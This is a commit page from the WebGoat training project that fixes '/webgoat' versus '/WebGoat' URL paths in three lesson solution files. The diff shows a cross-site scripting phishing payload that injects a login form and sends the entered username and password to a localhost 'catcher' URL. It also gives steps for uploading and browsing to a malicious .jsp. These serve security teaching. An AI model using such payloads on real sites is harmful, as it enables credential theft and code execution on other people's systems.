Skip to content

Commit c5f8b99

Browse files
Fixed more /webgoat versus /WebGoat issues.
git-svn-id: http://webgoat.googlecode.com/svn/trunk@467 4033779f-a91e-0410-96ef-6bf7bf53c507
1 parent 4d0522c commit c5f8b99

File tree

3 files changed

+6
-6
lines changed

3 files changed

+6
-6
lines changed

webgoat/src/main/webapp/lesson_solutions/MaliciousFileExecution.html

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -36,8 +36,8 @@
3636
<font size="2"><b>Viewing properties of the uploaded image in Firefox.</b></font><br/><br/><br/><br/>
3737
<img src="lesson_solutions/MaliciousFileExecution_files/image002.jpg"><br/>
3838
<font size="2"><b>File path for the uploaded image (and our .jsp) in Firefox.</b></font><br/><br/>
39-
The URL should look something like <b>http://localhost/webgoat/uploads/image.jpg</b>.<br/>
40-
The last step is to upload our malicious .jsp and browse to it so it will execute. Upload the file, then type its address into your browser. The address should be something like <b>http://localhost/webgoat/uploads/yourfile.jsp</b>.<br/><br/>
39+
The URL should look something like <b>http://localhost/WebGoat/uploads/image.jpg</b>.<br/>
40+
The last step is to upload our malicious .jsp and browse to it so it will execute. Upload the file, then type its address into your browser. The address should be something like <b>http://localhost/WebGoat/uploads/yourfile.jsp</b>.<br/><br/>
4141
A blank page will load. You can then return to the lesson and refresh, completing the lesson.<br/><br/><br/>
4242

4343

webgoat/src/main/webapp/lesson_solutions/Phishing.html

Lines changed: 3 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -18,7 +18,7 @@
1818
<p><b>General Goal(s):</b><br/>
1919
The user should be able to add a form asking for username
2020
and password. On submit the input should be sent to
21-
http://localhost/webgoat/catcher?PROPERTY=yes&user=catchedUserName&password=catchedPasswordName
21+
http://localhost/WebGoat/catcher?PROPERTY=yes&user=catchedUserName&password=catchedPasswordName
2222
</p>
2323

2424
<b>Solution:</b><br/>
@@ -38,7 +38,7 @@
3838
</p>
3939
Now you need a script:
4040
<p>
41-
&lt;script&gt;function hack(){ XSSImage=new Image; XSSImage.src=&quot;<font color="blue">http://localhost/webgoat/</font>catcher?PROPERTY=yes&amp;user=&quot;+
41+
&lt;script&gt;function hack(){ XSSImage=new Image; XSSImage.src=&quot;<font color="blue">http://localhost/WebGoat/</font>catcher?PROPERTY=yes&amp;user=&quot;+
4242
document.phish.user.value + &quot;&amp;password=&quot; + document.phish.pass.value + &quot;&quot;; alert(&quot;Had this been a real attack... Your credentials were just stolen.
4343
User Name = &quot; + document.phish.user.value + &quot;Password = &quot; + document.phish.pass.value);}
4444
&lt;/script&gt;
@@ -53,7 +53,7 @@
5353
&lt;input type=&quot;submit&quot; name=&quot;login&quot; value=&quot;login&quot; onclick=&quot;hack()&quot;&gt;
5454
<p>
5555
The final String looks like this:<br/>
56-
&lt;/form&gt;&lt;script&gt;function hack(){ XSSImage=new Image; XSSImage.src=&quot;<font color="blue">http://localhost/webgoat/</font>catcher?PROPERTY=yes&amp;user=&quot;+
56+
&lt;/form&gt;&lt;script&gt;function hack(){ XSSImage=new Image; XSSImage.src=&quot;<font color="blue">http://localhost/WebGoat/</font>catcher?PROPERTY=yes&amp;user=&quot;+
5757
document.phish.user.value + &quot;&amp;password=&quot; + document.phish.pass.value + &quot;&quot;; alert(&quot;Had this been a real attack... Your credentials were just stolen.
5858
User Name = &quot; + document.phish.user.value + &quot;Password = &quot; + document.phish.pass.value);}
5959
&lt;/script&gt;&lt;form name=&quot;phish&quot;&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H3

webgoat/src/main/webapp/lesson_solutions/SoapRequest.html

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -777,7 +777,7 @@ <h2><span style='color:windowtext'>Solution:<o:p></o:p></span></h2>
777777
<li class=MsoNormal style='mso-list:l0 level1 lfo3;tab-stops:list 36.0pt'><span
778778
style='font-family:"Arial","sans-serif"'>Change the POST header to open
779779
the SoapRequest: <br/>
780-
POST http://localhost/webgoat/services/SoapRequest HTTP/1.1 <b>(This will vary based on which ports you are using)</b><o:p></o:p></span></li>
780+
POST http://localhost/WebGoat/services/SoapRequest HTTP/1.1 <b>(This will vary based on which ports you are using)</b><o:p></o:p></span></li>
781781
<li class=MsoNormal style='mso-list:l0 level1 lfo3;tab-stops:list 36.0pt'><span
782782
style='font-family:"Arial","sans-serif"'>Change the Content-Type to
783783
text/xml:<br/>

0 commit comments

Comments
 (0)